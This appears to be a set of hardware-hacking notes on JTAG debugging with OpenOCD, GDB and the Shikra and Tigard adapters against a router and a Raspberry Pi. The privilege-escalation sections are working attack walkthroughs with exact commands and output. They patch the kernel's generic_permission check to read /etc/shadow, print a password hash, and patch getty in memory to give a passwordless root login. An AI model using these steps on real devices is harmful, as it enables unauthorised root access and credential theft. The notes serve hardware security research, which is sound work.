Link to this headingJTAG (IEEE 1149.1)

JTAG on a HDD

Link to this headingFinding the Pins

Source

JTAG Pins Identification

Pin Info:

  • TDI: Serial Test data input of the boundary scan link
  • TDO: Serial Test data output of the boundary scan link
  • TMS: Test mode select for the state machine
  • TCK: Test clock to synchronize stat machine operations
  • TRST: JTAG Reset for the TAP controller’s state machine

Link to this headingUsing Shikra

Pinout:

  • TCK: 1
  • TDI: 2
  • TDO: 3
  • TMS: 4
  • GND: 18

Shikra Config:

>>> cat /usr/share/openocd/scripts/interface/shikra.cfg #shikra.cfg adapter driver ftdi ftdi_vid_pid 0x0403 0x6014 ftdi_layout_init 0x0c08 0x0f1b adapter speed 2000 #end shikra.cfg

OpenOcd Raspi config:

# Raspberry Pi 4 telnet_port 4444 gdb_port 3333 transport select jtag adapter speed 125 jtag_ntrst_delay 500 reset_config trst_only trst_open_drain gdb_breakpoint_override hard if { [info exists CHIPNAME] } { set _CHIPNAME $CHIPNAME } else { set _CHIPNAME bcm2711 } if { [info exists DAP_TAPID] } { set _DAP_TAPID $DAP_TAPID } else { set _DAP_TAPID 0x4ba00477 } jtag newtap $_CHIPNAME tap -irlen 4 -ircapture 0x1 -irmask 0xf -expected-id $_DAP_TAPID -enable dap create $_CHIPNAME.dap -chain-position $_CHIPNAME.tap set _TARGETNAME $_CHIPNAME.a72 set _CTINAME $_CHIPNAME.cti set DBGBASE {0x80410000 0x80510000 0x80610000 0x80710000} set CTIBASE {0x80420000 0x80520000 0x80620000 0x80720000} set _cores 4 for { set _core 0 } { $_core < $_cores } { incr _core } { cti create $_CTINAME.$_core -dap $_CHIPNAME.dap -ap-num 0 \ -baseaddr [lindex $CTIBASE $_core] target create $_TARGETNAME.$_core aarch64 \ -dap $_CHIPNAME.dap -coreid $_core \ -dbgbase [lindex $DBGBASE $_core] -cti $_CTINAME.$_core $_TARGETNAME.$_core configure -event gdb-attach { halt } } # Uncomment below to use SMP #target smp $_TARGETNAME.0 $_TARGETNAME.1 $_TARGETNAME.2 $_TARGETNAME.3 #targets $_TARGETNAME.0

Use OpenOCD with Shikra:

>>> sudo openocd -f /usr/share/openocd/scripts/interface/shikra.cfg -f /usr/share/openocd/scripts/target/at91sam7x512.cfg Open On-Chip Debugger 0.10.0 Licensed under GNU GPL v2 For bug reports, read http://openocd.org/doc/doxygen/bugs.html adapter speed: 2000 kHz srst_only srst_pulls_trst srst_gates_jtag srst_open_drain connect_deassert_srst Info : auto-selecting first available session transport "jtag". To override use 'transport select <transport>'. Info : clock speed 2000 kHz Error: JTAG scan chain interrogation failed: all ones Error: Check JTAG interface, timings, target power, etc. Error: Trying to use configured scan chain anyway... Error: sam7x512.cpu: IR capture error; saw 0x0f not 0x01 Warn : Bypassing JTAG setup events due to errors Info : Embedded ICE version 15 Error: unknown EmbeddedICE version (comms ctrl: 0xffffffff) Info : sam7x512.cpu: hardware has 2 breakpoint/watchpoint units Warn : ThumbEE -- incomplete support Info : accepting 'telnet' connection on tcp/4444

Link to this headingUsing Tigard

Tigard Config:

>>> cat /usr/share/openocd/scripts/interface/tigard.cfg interface ftdi ftdi_vid_pid 0x0403 0x6010 ftdi_channel 1 adapter speed 2000 ftdi_layout_init 0x0078 0x017b ftdi_layout_signal nTRST -ndata 0x0010 -noe 0x0040 ftdi_layout_signal nSRST -ndata 0x0020 -noe 0x0040 transport select jtag

Link to this headingOCD Router Experiment

Running OCD on Router:

>>> openocd -f tigard-jtag.cfg -f mt7620n.cfg Open On-Chip Debugger 0.11.0 Licensed under GNU GPL v2 For bug reports, read http://openocd.org/doc/doxygen/bugs.html jtag mt7620.cpu Info : Listening on port 6666 for tcl connections Info : Listening on port 4444 for telnet connections Info : clock speed 2000 kHz Info : JTAG tap: mt7620.cpu tap/device found: 0x1635224f (mfg: 0x127 (MIPS Technologies), part: 0x6352, ver: 0x1) Info : starting gdb server for mt7620.cpu on 3333 Info : Listening on port 3333 for gdb connections

Connect to OCD on Router:

>>> telnet localhost 4444 Trying ::1... telnet: connect to address ::1: Connection refused Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. Open On-Chip Debugger > halt MIPS32 with MIPS16 support implemented target halted in MIPS32 mode due to debug-request, pc: 0x80011090 > step target halted in MIPS32 mode due to single-step, pc: 0x80011094 > reg ===== mips32 registers (0) r0 (/32): 0x00000000 (1) r1 (/32): 0x00000000 (2) r2 (/32): 0x1100a401 (3) r3 (/32): 0x00000000 (4) r4 (/32): 0x00000000 (5) r5 (/32): 0x01000000 (6) r6 (/32): 0x1100a400 (7) r7 (/32): 0xffff00fe (8) r8 (/32): 0x802f9fe0 (9) r9 (/32): 0x0000a400 (10) r10 (/32): 0x000f4240 (11) r11 (/32): 0x00000000 (12) r12 (/32): 0x00000035 (13) r13 (/32): 0x777eb3a0 (14) r14 (/32): 0x000003e8 (15) r15 (/32): 0x7789e000 (16) r16 (/32): 0x80300000 (17) r17 (/32): 0x00000001 (18) r18 (/32): 0x802aa744 (19) r19 (/32): 0x00000001 (20) r20 (/32): 0x83fe0000 (21) r21 (/32): 0x00000000 (22) r22 (/32): 0x83fe0000 (23) r23 (/32): 0x00000000 (24) r24 (/32): 0x000003e8 (25) r25 (/32): 0x8001107c (26) r26 (/32): 0x802f9eb8 (27) r27 (/32): 0x802f9eb8 (28) r28 (/32): 0x802f8000 (29) r29 (/32): 0x802f9eb8 (30) r30 (/32): 0x83fe0000 (31) r31 (/32): 0x80043540 (32) status (/32): 0x1100a401 (33) lo (/32): 0x402da580 (34) hi (/32): 0x00000035 (35) badvaddr (/32): 0x777e3468 (36) cause (/32): 0xd0808000 (37) pc (/32): 0x80043500 (38) f0 (/32): 0x00000000 (39) f1 (/32): 0x00000000 (40) f2 (/32): 0x00000000 (41) f3 (/32): 0x00000000 (42) f4 (/32): 0x00000000 (43) f5 (/32): 0x00000000 (44) f6 (/32): 0x00000000 (45) f7 (/32): 0x00000000 (46) f8 (/32): 0x00000000 (47) f9 (/32): 0x00000000 (48) f10 (/32): 0x00000000 (49) f11 (/32): 0x00000000 (50) f12 (/32): 0x00000000 (51) f13 (/32): 0x00000000 (52) f14 (/32): 0x00000000 (53) f15 (/32): 0x00000000 (54) f16 (/32): 0x00000000 (55) f17 (/32): 0x00000000 (56) f18 (/32): 0x00000000 (57) f19 (/32): 0x00000000 (58) f20 (/32): 0x00000000 (59) f21 (/32): 0x00000000 (60) f22 (/32): 0x00000000 (61) f23 (/32): 0x00000000 (62) f24 (/32): 0x00000000 (63) f25 (/32): 0x00000000 (64) f26 (/32): 0x00000000 (65) f27 (/32): 0x00000000 (66) f28 (/32): 0x00000000 (67) f29 (/32): 0x00000000 (68) f30 (/32): 0x00000000 (69) f31 (/32): 0x00000000 (70) fcsr (/32): 0x00000000 (71) fir (/32): 0x00000000

Read Memory from openocd:

>>> telnet localhost 4444 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. Open On-Chip Debugger > halt > mem2arrat tcl_varable_name 32 0xd0000000 0x1000 invalid command name "mem2arrat" > mem2array tcl_varable_name 32 0xd0000000 0x1000 mem2array: Read @ 0xd0000000, w=4, cnt=1024, failed > mem2array tcl_varable_name 32 0x00000000 0x1000 mem2array: Read @ 0x00000000, w=4, cnt=1024, failed > mem2array tcl_varable_name 32 0x00000000 0x100 mem2array: Read @ 0x00000000, w=4, cnt=256, failed > dump_image mydump.bin 0x80000000 0x2000000

Link to this headingGDB Router Experiment

$gdb-multiarch GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git Copyright (C) 2021 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <https://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word". (gdb) set architecture mips The target architecture is set to "mips". (gdb) target extended-remote localhost:3333 Remote debugging using localhost:3333 warning: No executable has been specified and target does not support determining executable automatically. Try using the "file" command. 0xff200208 in ?? () (gdb) res (gdb) i r zero at v0 v1 a0 a1 a2 a3 R0 00000000 00000001 ec4e4000 000000c0 00026cbb 0002ee00 00000000 0000039b t0 t1 t2 t3 t4 t5 t6 t7 R8 0000002e 676e6974 206e6920 65732033 00000000 777eb3a0 00000000 64692065 s0 s1 s2 s3 s4 s5 s6 s7 R16 00000960 00000001 00000a28 80340000 00000047 80340000 80340000 000003e8 t8 t9 k0 k1 gp sp s8 ra R24 00000003 8017ff5c 802f9c18 802f9c18 802f8000 802f9c80 83fe0000 8002407c status lo hi badvaddr cause pc 1100a400 11aa0000 0000039b ff2001fc 50808000 8013e560 fcsr fir 00000000 00000000 (gdb) cont Continuing. ^C Program received signal SIGINT, Interrupt. 0x8013e560 in ?? (warning: GDB can't find the start of the function at 0x8013e560. GDB is unable to find the start of the function at 0x8013e560 and thus can't determine the size of that function's stack frame. This means that GDB may be unable to access that stack frame, or the frames below it. This problem is most likely caused by an invalid program counter or stack pointer. However, if you think GDB should simply search farther back from 0x8013e560 for code which looks like the beginning of a function, you can increase the range of the search using the `set heuristic-fence-post' command. ) (gdb) x/10w $pc 0x8013e560: 343998463 612696063 65011720 0 0x8013e570: 1006796848 -1941722000 1006764038 876776892 0x8013e580: 6422553 4114 (gdb) x/10i $pc => 0x8013e560: bnez a0,0x8013e560 0x8013e564: addiu a0,a0,-1 0x8013e568: jr ra 0x8013e56c: nop 0x8013e570: lui v0,0x8030 0x8013e574: lw v1,-21392(v0) 0x8013e578: lui v0,0x6 0x8013e57c: ori v0,v0,0x8dbc 0x8013e580: multu v1,v0 0x8013e584: mflo v0

Link to this headingPrivilege Escalation

Finding the Kernel Boot args:

find 00000000, FFFFFFFF, "console"

Patching Boot Args:

telnet localhost 4444 #Halt CPU > halt # Read Memory at Address > mdw 0x8020dcc8 # Write data to memory > mww 0x8020dcc8 0xffffffff # Read Memory at Address > mdw 0x8020dcc8 # Create Watch Point and resume CPU execution > wp 0x8020dcc8 4; resume # When the Watch Point is triggered remove the watchpoint # Step to the next instruction so that the data is written. # Show the Written data > rwp 0x8020dcc8; step; mdw 0x8020dcc8 # Write the new boot args to the memory address > mww 0x8020dcc8 0x324d2031 # Check that it is written correctly > mdw 0x8020dcc8 # Resume the CPU > resume

Link to this headingPatching Kernel Memory MIPS

We are patching kernel memory so that the generic_permission function that checks if a user has permissions to readn or write a file does not return a Access Error. This allow us to operate as root with out the permissions

Find the generic_permission function:

user@OpenWrt:~$ cat /proc/kallsyms | grep generic_permission 800a8a38 T generic_permission

GDB memory info:

(gdb) x/200i 0x800a8a38 [...] 0x800a8ad4: li v0,-13 0x800a8ad8: andi s2,s2,0x1 0x800a8adc: beqz s2,0x800a8b00 0x800a8ae0: andi v0,v0,0x49 0x800a8ae4: bnez v0,0x800a8b04 0x800a8ae8: move a0,s0 0x800a8aec: li v0,4 [...] 0x800a8b2c: li v0,-13 0x800a8b30: lw ra,36(sp) 0x800a8b34: lw s3,32(sp) 0x800a8b38: lw s2,28(sp) 0x800a8b3c: lw s1,24(sp) 0x800a8b40: lw s0,20(sp) 0x800a8b44: jr ra

Break on E_Access (-13) Load instructions:

# 0x800a8ad4: li v0,-13 # 0x800a8afc: li v0,-13 # 0x800a8b2c: li v0,-13 (gdb) break *0x800a8ad4 warning: Breakpoint address adjusted from 0xffffffff800a8ad4 to 0xffffffff800a8ad0. Breakpoint 2 at 0x800a8ad0 (gdb) break *0x800a8afc warning: Breakpoint address adjusted from 0xffffffff800a8afc to 0xffffffff800a8af8. Breakpoint 3 at 0x800a8af8 (gdb) break *0x800a8b2c Breakpoint 4 at 0x800a8b2c

Trigger the E_Access Error:

user@OpenWrt:~$ cat /etc/shadow

Modify the generic_permission function Memory:

telnet localhost 4444 Trying ::1... Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. Open On-Chip Debugger accepting 'gdb' connection on tcp/3333 MIPS32 with MIPS16 support implemented target halted in MIPS32 mode due to debug-request, pc: 0x80011090 # 0x00000000 is NOP in MIPS > mww 0x800a8ad4 0x00000000 > mww 0x800a8b2c 0x00000000

Check with GDB:

(gdb) x/5i 0x800a8ad4 0x800a8ad4: nop 0x800a8ad8: andi s2,s2,0x1 0x800a8adc: beqz s2,0x800a8b00 0x800a8ae0: andi v0,v0,0x49 0x800a8ae4: bnez v0,0x800a8b04 0x800a8ae8: move a0,s0 gdb) x/5i 0x800a8b2c 0x800a8b2c: nop 0x800a8b30: lw ra,36(sp) 0x800a8b34: lw s3,32(sp) 0x800a8b38: lw s2,28(sp) 0x800a8b3c: lw s1,24(sp)

Link to this headingPatching Kernel Memory ARM

We are patching kernel memory so that the generic_permission function that checks if a user has permissions to readn or write a file does not return a Access Error. This allow us to operate as root with out the permissions

Find the generic_permission function:

pi@raspberrypi:~$ sudo cat /proc/kallsyms | grep generic_permission c0136dd4 T generic_permission c0712514 R __ksymtab_generic_permission c071dc94 r __kcrctab_generic_permission c0729124 r __kstrtab_generic_permission

Use GDB to find the -13:

$gdb-multiarch GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git Copyright (C) 2021 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <https://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word". (gdb) set architecture armv7 The target architecture is set to "armv7". (gdb) target extended-remote localhost:3333 Remote debugging using localhost:3333 (gdb) x/200i 0xc0136dd4 0xc0136dd4: mov r12, sp 0xc0136dd8: push {r3, r4, r5, r6, r7, r8, r11, r12, lr, pc} 0xc0136ddc: sub r11, r12, #4 0xc0136de0: push {lr} ; (str lr, [sp, #-4]!) 0xc0136de4: ldmfd sp!, {lr} 0xc0136de8: mov r3, sp 0xc0136dec: bic r3, r3, #8128 ; 0x1fc0 0xc0136df0: bic r3, r3, #63 ; 0x3f [...] 0xc0136eb0: mvn r0, #12 0xc0136eb4: ldm sp, {r3, r4, r5, r6, r7, r8, r11, sp, pc}

Set the Breakpoints:

(gdb) break *0xC0136EB0 Breakpoint 9 at 0xc0136eb0 (gdb) c Continuing. Breakpoint 9, 0xc0136eb0 in ?? () (gdb) info reg $r0 r0 0x0 0 (gdb) x/10i $pc => 0xc0136eb0: mvn r0, #12 0xc0136eb4: ldm sp, {r3, r4, r5, r6, r7, r8, r11, sp, pc} 0xc0136eb8: mov r0, r5 0xc0136ebc: mov r1, #1 0xc0136ec0: bl 0xc00296f4 0xc0136ec4: cmp r0, #0 0xc0136ec8: bne 0xc0136e28 0xc0136ecc: tst r6, #2 0xc0136ed0: beq 0xc0136e9c 0xc0136ed4: b 0xc0136eb0 (gdb) nexti 0xc0136eb4 in ?? () (gdb) x/10i $pc => 0xc0136eb4: ldm sp, {r3, r4, r5, r6, r7, r8, r11, sp, pc} 0xc0136eb8: mov r0, r5 0xc0136ebc: mov r1, #1 0xc0136ec0: bl 0xc00296f4 0xc0136ec4: cmp r0, #0 0xc0136ec8: bne 0xc0136e28 0xc0136ecc: tst r6, #2 0xc0136ed0: beq 0xc0136e9c 0xc0136ed4: b 0xc0136eb0 0xc0136ed8: tst r6, #128 ; 0x80 (gdb) info reg $r0 r0 0xfffffff3 4294967283 (gdb)

Test Register Change:

(gdb) set $r0=0 (gdb) info reg $r0 r0 0x0 0

Trigger the E_Access Error:

user@OpenWrt:~$ cat /etc/shadow

Modify the generic_permission function Memory:

telnet localhost 4444 Trying ::1... Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. Open On-Chip Debugger accepting 'gdb' connection on tcp/3333 MIPS32 with MIPS16 support implemented target halted in MIPS32 mode due to debug-request, pc: 0x80011090 # 0x00f020e3 is NOP in ARM # There is a bug with writing more than one byte at a time > mwb 0xc0136eb0 0x00 > mwb 0xc0136eb1 0xf0 > mwb 0xc0136eb2 0x20 > mwb 0xc0136eb3 0xe3 > mdw 0xc0136eb0 0xc0136eb0: e320f000

Check with GDB:

(gdb) x/10i 0xc0136eb0 0xc0136eb0: nop {0} 0xc0136eb4: ldm sp, {r3, r4, r5, r6, r7, r8, r11, sp, pc} 0xc0136eb8: mov r0, r5 0xc0136ebc: mov r1, #1 0xc0136ec0: bl 0xc00296f4 0xc0136ec4: cmp r0, #0 0xc0136ec8: bne 0xc0136e28 0xc0136ecc: tst r6, #2 0xc0136ed0: beq 0xc0136e9c 0xc0136ed4: b 0xc0136eb0

Do the Test:

pi@raspberrypi:~$ cat /etc/shadow cat: /etc/shadow: Permission denied pi@raspberrypi:~$ cat /etc/shadow root:*:16948:0:99999:7::: daemon:*:16948:0:99999:7::: bin:*:16948:0:99999:7::: sys:*:16948:0:99999:7::: sync:*:16948:0:99999:7::: games:*:16948:0:99999:7::: man:*:16948:0:99999:7::: lp:*:16948:0:99999:7::: mail:*:16948:0:99999:7::: news:*:16948:0:99999:7::: uucp:*:16948:0:99999:7::: proxy:*:16948:0:99999:7::: www-data:*:16948:0:99999:7::: backup:*:16948:0:99999:7::: list:*:16948:0:99999:7::: irc:*:16948:0:99999:7::: gnats:*:16948:0:99999:7::: nobody:*:16948:0:99999:7::: systemd-timesync:*:16948:0:99999:7::: systemd-network:*:16948:0:99999:7::: systemd-resolve:*:16948:0:99999:7::: systemd-bus-proxy:*:16948:0:99999:7::: pi:$6$X8NLlS0p$2S1FocpEf70CQkDf/fo6DjBo6/2qAQh4hi1ZnaQ8xLZMNEAOf/VAoiuGOspW/v6CpNvJr.SL5m6EM6yPwQIgq/:16948:0:99999:7::: messagebus:*:16948:0:99999:7::: avahi:*:16948:0:99999:7::: ntp:*:16948:0:99999:7::: sshd:*:16948:0:99999:7::: statd:*:16948:0:99999:7::: lightdm:*:16948:0:99999:7::: pulse:*:16948:0:99999:7::: rtkit:*:16948:0:99999:7:::

Link to this headingPatching Program Memory ARM

We are patching the getty process to make it run login -f username instead of login -- username. The -f flag is used to skip login authentication. This allows someone with a login prompt to login without knowing the password.

Find the offsets to the “–” string:

pi@raspberrypi:~$ xxd /sbin/getty | grep "\-\-" [...] 0006b40: 2d66 0000 2d2d 0000 2573 3a20 6361 6e27 -f..--..%s: can'

Using my Find and Replace Script:

$python ocd_mem_find_replace.py -f "2d66 0000 2d2d 0000" -r "2d66 0000 2d66 0000" -o 0x6b40 -s 0xd0000000 {5: '0x66'} Starting Scanning Range 0xd0000000 - 0xd1000000 Starting Scanning Range 0xd1000000 - 0xd2000000 Starting Scanning Range 0xd2000000 - 0xd3000000 Starting Scanning Range 0xd3000000 - 0xd4000000 Starting Scanning Range 0xd4000000 - 0xd5000000 Starting Scanning Range 0xd5000000 - 0xd6000000 Starting Scanning Range 0xd6000000 - 0xd7000000 Found Partial Match at 0xd6cf9b40: 0000662d Found Partial Match at 0xd6cf9b44: 00002d2d Found Match at 0xd6cf9b40: ['0000662d', '00002d2d'] Paching Address 0xd6cf9b40: 00002d2d -> 2d66 0000 2d66 0000 mwb phys 0xD6CF9B45 0x66 Resuming the Process

Login without Password:

Raspbian GNU/Linux 8 raspberrypi ttyAMA0 raspberrypi login: root Last login: Sun Jul 24 15:29:32 UTC 2016 on ttyAMA0 Linux raspberrypi 4.4.13+ #894 Mon Jun 13 12:43:26 BST 2016 armv6l The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. root@raspberrypi:~#

Link to this headingUsing Openocd

Finding Number of taps:

>>> sudo openocd -f /usr/share/openocd/scripts/interface/ftdi/tigard-jtag.cfg Open On-Chip Debugger 0.11.0-rc1+dev-00015-gd4bf20756-dirty (2021-01-13-00:58) Licensed under GNU GPL v2 For bug reports, read http://openocd.org/doc/doxygen/bugs.html jtag Info : Listening on port 6666 for tcl connections Info : Listening on port 4444 for telnet connections Info : clock speed 2000 kHz Warn : There are no enabled taps. AUTO PROBING MIGHT NOT WORK!! Info : JTAG tap: auto0.tap tap/device found: 0x4ba00477 (mfg: 0x23b (ARM Ltd), part: 0xba00, ver: 0x4) Warn : AUTO auto0.tap - use "jtag newtap auto0 tap -irlen 4 -expected-id 0x4ba00477" Warn : gdb services need one or more targets defined

Connecting to the Telnet Console:

>>> telnet localhost 4444 Trying ::1... Connection failed: Connection refused Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. Open On-Chip Debugger > reset halt Can't assert SRST: nSRST signal is not defined JTAG scan chain interrogation failed: all ones Check JTAG interface, timings, target power, etc. Trying to use configured scan chain anyway... sam7x512.cpu: IR capture error; saw 0x0f not 0x01 Bypassing JTAG setup events due to errors Can't assert SRST: nSRST signal is not defined ThumbEE -- incomplete support target halted in ThumbEE state due to watchpoint, current mode: System cpsr: 0xffffffff pc: 0xfffffff9 srst pulls trst - can not reset into halted mode. Issuing halt after reset. NOTE! DCC downloads have not been enabled, defaulting to slow memory writes. Type 'help dcc'. NOTE! Severe performance degradation without fast memory access enabled. Type 'help fast'. > dump_image dump_proxmark3.pin 0x100000 0x100000 dumped 1048576 bytes in 15.351289s (66.704 KiB/s) > reg > flash info 0 > flash list > flash banks

CPU Commands:

#Halt the CPU > reset halt #Show Registers > reg #Resume the CPU > reset run

Memory Commands:

#Get Memory Information > flash info 0 > flash list > flash banks #Dump Memory > dump_image raspi_kern_c0.bin 0xc0000000 0x01000000 #Erase Memory > flash write_image erase "Desktop/FirstApp.hex"

Link to this headingUsing ftjrev

Scan JTAG for Clocks

Scanning for Clocks:

$ ./ftjrev clocks Found 3 devices with total IR length of 26 Device 0: IDCODE 2295C093 (XC5VLX330-FFG1760) Device 1: IDCODE 21C2E093 (XC3S1200E-FT256) Device 2: IDCODE 2295C093 (XC5VLX330-FFG1760) Total boundary scan chain: 8572 Clock pass... CLOCK: 0[XC5VLX330-FFG1760]:IO_AN14 CLOCK: 0[XC5VLX330-FFG1760]:IO_J13 CLOCK: 0[XC5VLX330-FFG1760]:IO_K13 CLOCK: 1[XC3S1200E-FT256]:IPAD78 CLOCK: 1[XC3S1200E-FT256]:K2 CLOCK: 1[XC3S1200E-FT256]:IPAD258 CLOCK: 1[XC3S1200E-FT256]:L8 CLOCK: 2[XC5VLX330-FFG1760]:IO_AM13 CLOCK: 2[XC5VLX330-FFG1760]:IO_J30 CLOCK: 2[XC5VLX330-FFG1760]:IO_P37

Scanning for Devices:

$ ./ftjrev scan Found 3 devices with total IR length of 26 Device 0: IDCODE 2295C093 (XC5VLX330-FFG1760) Device 1: IDCODE 21C2E093 (XC3S1200E-FT256) Device 2: IDCODE 2295C093 (XC5VLX330-FFG1760) Total boundary scan chain: 8572 Clock pass... CLOCK: 0[XC5VLX330-FFG1760]:IO_AN14 CLOCK: 0[XC5VLX330-FFG1760]:IO_J13 CLOCK: 0[XC5VLX330-FFG1760]:IO_K13 CLOCK: 1[XC3S1200E-FT256]:IPAD78 CLOCK: 1[XC3S1200E-FT256]:K2 CLOCK: 1[XC3S1200E-FT256]:IPAD258 CLOCK: 1[XC3S1200E-FT256]:L8 CLOCK: 2[XC5VLX330-FFG1760]:IO_AM13 CLOCK: 2[XC5VLX330-FFG1760]:IO_J30 CLOCK: 2[XC5VLX330-FFG1760]:IO_P37 Pin pass... 0[XC5VLX330-FFG1760]:IO_BB13 --> 2[XC5VLX330-FFG1760]:IO_AT16 0[XC5VLX330-FFG1760]:IO_AY12 --> 2[XC5VLX330-FFG1760]:IO_AW17 0[XC5VLX330-FFG1760]:IO_AY13 --> 2[XC5VLX330-FFG1760]:IO_AT20 0[XC5VLX330-FFG1760]:IO_BA11 --> 2[XC5VLX330-FFG1760]:IO_AT19 0[XC5VLX330-FFG1760]:IO_BB11 --> 2[XC5VLX330-FFG1760]:IO_AT17 0[XC5VLX330-FFG1760]:IO_BB12 --> 2[XC5VLX330-FFG1760]:IO_AU16 0[XC5VLX330-FFG1760]:IO_AW12 --> 2[XC5VLX330-FFG1760]:IO_AW18 0[XC5VLX330-FFG1760]:IO_AW11 --> 2[XC5VLX330-FFG1760]:IO_AV35

Scanning for Input Pins:

$ ./ftjrev iprobe Found 3 devices with total IR length of 26 Device 0: IDCODE 2295C093 (XC5VLX330-FFG1760) Device 1: IDCODE 21C2E093 (XC3S1200E-FT256) Device 2: IDCODE 2295C093 (XC5VLX330-FFG1760) Total boundary scan chain: 8572 Clock pass... CLOCK: 0[XC5VLX330-FFG1760]:IO_AN14 CLOCK: 0[XC5VLX330-FFG1760]:IO_J13 CLOCK: 0[XC5VLX330-FFG1760]:IO_K13 CLOCK: 1[XC3S1200E-FT256]:IPAD78 CLOCK: 1[XC3S1200E-FT256]:K2 CLOCK: 1[XC3S1200E-FT256]:IPAD258 CLOCK: 1[XC3S1200E-FT256]:L8 CLOCK: 2[XC5VLX330-FFG1760]:IO_AM13 CLOCK: 2[XC5VLX330-FFG1760]:IO_J30 CLOCK: 2[XC5VLX330-FFG1760]:IO_P37 Probing inputs, press ctrl+c to stop... 0[XC5VLX330-FFG1760]:IO_K20 0[XC5VLX330-FFG1760]:IO_K20 0[XC5VLX330-FFG1760]:IO_K20 0[XC5VLX330-FFG1760]:IO_K20 0[XC5VLX330-FFG1760]:IO_K20 0[XC5VLX330-FFG1760]:IO_K20

Scanning for Output Pins:

$ stty -F /dev/ttyUSB2 speed 115200 $ ./ftjrev oprobe > /dev/ttyUSB2 Found 3 devices with total IR length of 26 Device 0: IDCODE 2295C093 (XC5VLX330-FFG1760) Device 1: IDCODE 21C2E093 (XC3S1200E-FT256) Device 2: IDCODE 2295C093 (XC5VLX330-FFG1760) Total boundary scan chain: 8572 Clock pass... Probing outputs, press ctrl+c to stop...

halt
resume
step

Link to this headingUsing Urjatag